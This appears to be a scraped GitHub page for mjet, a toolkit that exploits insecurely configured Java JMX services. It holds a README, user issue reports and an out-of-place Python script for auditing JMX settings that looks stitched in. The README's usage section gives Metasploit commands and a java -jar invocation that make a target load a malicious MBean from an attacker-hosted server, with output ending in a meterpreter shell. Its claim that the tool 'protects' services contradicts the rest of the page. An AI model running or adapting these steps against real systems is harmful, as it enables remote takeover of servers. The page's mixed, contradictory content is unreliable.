mjet's Introduction

mjet

Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit

mjet is a tool that can be used to protect insecurely configured JMX services. It is based on the blog post "Exploiting JMX-RMI" by Braden Thomas/Accuvant (http://www.accuvant.com/blog/exploiting-jmx-rmi) and can be used to execute arbitrary Metasploit payloads on the target system.

mjet was originally planned to be a complete attack toolkit. However, we noticed that the Metasploit GitHub repository contains a pull request which will provide basic Java RMI/serialization support in native Ruby. This is awesome and removes the Java dependency, so we stopped developing this tool and will create Metasploit modules in the near future.

mjet consists of the following parts:

  • A Metasploit module which emulates a "mlet Server". This is basically a web server which hosts an HTML file that contains a mlet tag
  • A ManagedBean that is changed by the mlet server module to include the selected payload
  • A jar archive that is used to contact the insecure JMX service

Installation (with the github version of Metasploit)

  • Copy the "MBean" folder to "data/java/metasploit"
  • Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

Usage

The example uses the following systems: attacker 192.168.178.1; target 192.168.178.200, with the JMX service running on TCP port 1616.

  • Configure/start the metasploit module "java_mlet_server". The module will run as a background job
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

Use mjet.jar to connect to the vulnerable JMX service and provide the URL to the MLet Web server...

java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

and enjoy your meterpreter shell :-)
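A defender-side check for the kind of JMX service the usage above targets, as an added example that is not part of mjet or Metasploit: it audits JVM command lines for a remote JMX connector started with authentication or TLS switched off. It assumes the JVM is configured through the standard `com.sun.management.*` system properties; the function names and sample command lines are constructed for illustration.

```python
import shlex

NS = "com.sun.management."

def management_properties(cmdline):
    """Collect -Dcom.sun.management.* properties from one JVM command line."""
    props = {}
    for token in shlex.split(cmdline):
        if token.startswith("-D" + NS):
            key, _, value = token[2:].partition("=")
            props[key[len(NS):]] = value.strip()
    return props

def audit_jvm_cmdline(cmdline):
    """Return findings about remote JMX settings; an empty list means none."""
    props = management_properties(cmdline)
    findings = []
    config_file = props.get("config.file")
    if config_file:
        # Settings can also live in a properties file, which this check cannot see.
        findings.append(f"settings may also come from {config_file}; review that file")
    port = props.get("jmxremote.port")
    if not port:
        return findings  # no remote connector configured on the command line
    # authenticate and ssl both default to true once a port is set,
    # so only an explicit "false" weakens them.
    if props.get("jmxremote.authenticate", "true").lower() == "false":
        findings.append(f"port {port}: authentication disabled")
    if props.get("jmxremote.ssl", "true").lower() == "false":
        findings.append(f"port {port}: TLS disabled")
    return findings

# Constructed sample command lines (only the port number is taken from the page).
SAMPLES = {
    "open": "java -Dcom.sun.management.jmxremote.port=1616 "
            "-Dcom.sun.management.jmxremote.authenticate=false "
            "-Dcom.sun.management.jmxremote.ssl=false -jar app.jar",
    "defaults": "java -Dcom.sun.management.jmxremote.port=1616 -jar app.jar",
    "no-jmx": "java -Xmx512m -jar app.jar",
    "from-file": "java -Dcom.sun.management.config.file=/opt/app/management.properties "
                 "-jar app.jar",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, audit_jvm_cmdline(cmd))
```

Feed it the command lines of running Java processes (for example from a process listing) to find services that need authentication and TLS turned back on.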

mjet's People

Contributors

h0ng10

mjet's Issues

Need some explanation about the install part

Hey,

first of all thanks for the code.

I'm trying to use the exploit on Kali Linux 2 with the Metasploit framework (the default Metasploit that comes with the Kali Linux VM).
This is exactly what I did:

  1. download the files from here
  2. compiled the 3 java classes with javac command on the kali linux vm
  3. now i have the ruby file & the compiled classes

From here I don't know how to continue; I can't find the path specified for installation of the MBean dir, or the path for the Ruby file either.

thanks a lot.

No such file or directory @ rb_sysopen

Hi,

I did what you said in the installation part, but I am getting this error when I try to use the java_mlet_server.rb module.
[-] Exploit failed: No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/java/metasploit/Payload.class

As you see, the files are where they should be.

javax.naming.NameNotFoundException

I sent the payload:
./java -jar /root/mjet/mjet.jar -t 192.168.197.25 -p 1099 -u http://192.168.197.75:8080/mlet/

MJET - Mogwai Security JMX Exploitation Toolkit 0.1

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.197.25:1099/jmxrmi ...
java.io.IOException: Failed to retrieve RMIServer stub: javax.naming.NameNotFoundException: jmxrmi
at javax.management.remote.rmi.RMIConnector.connect(RMIConnector.java:369)
at javax.management.remote.JMXConnectorFactory.connect(JMXConnectorFactory.java:268)
at javax.management.remote.JMXConnectorFactory.connect(JMXConnectorFactory.java:227)
at de.mogwaisecurity.lab.mjet.Mjet.pwnJMXService(Mjet.java:76)
at de.mogwaisecurity.lab.mjet.Mjet.main(Mjet.java:40)
Caused by: javax.naming.NameNotFoundException: jmxrmi
at com.sun.jndi.rmi.registry.RegistryContext.lookup(RegistryContext.java:116)
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:203)
at javax.naming.InitialContext.lookup(InitialContext.java:411)
at javax.management.remote.rmi.RMIConnector.findRMIServerJNDI(RMIConnector.java:1929)
at javax.management.remote.rmi.RMIConnector.findRMIServer(RMIConnector.java:1896)
at javax.management.remote.rmi.RMIConnector.connect(RMIConnector.java:286)
... 4 more

But it looks like it does not work.
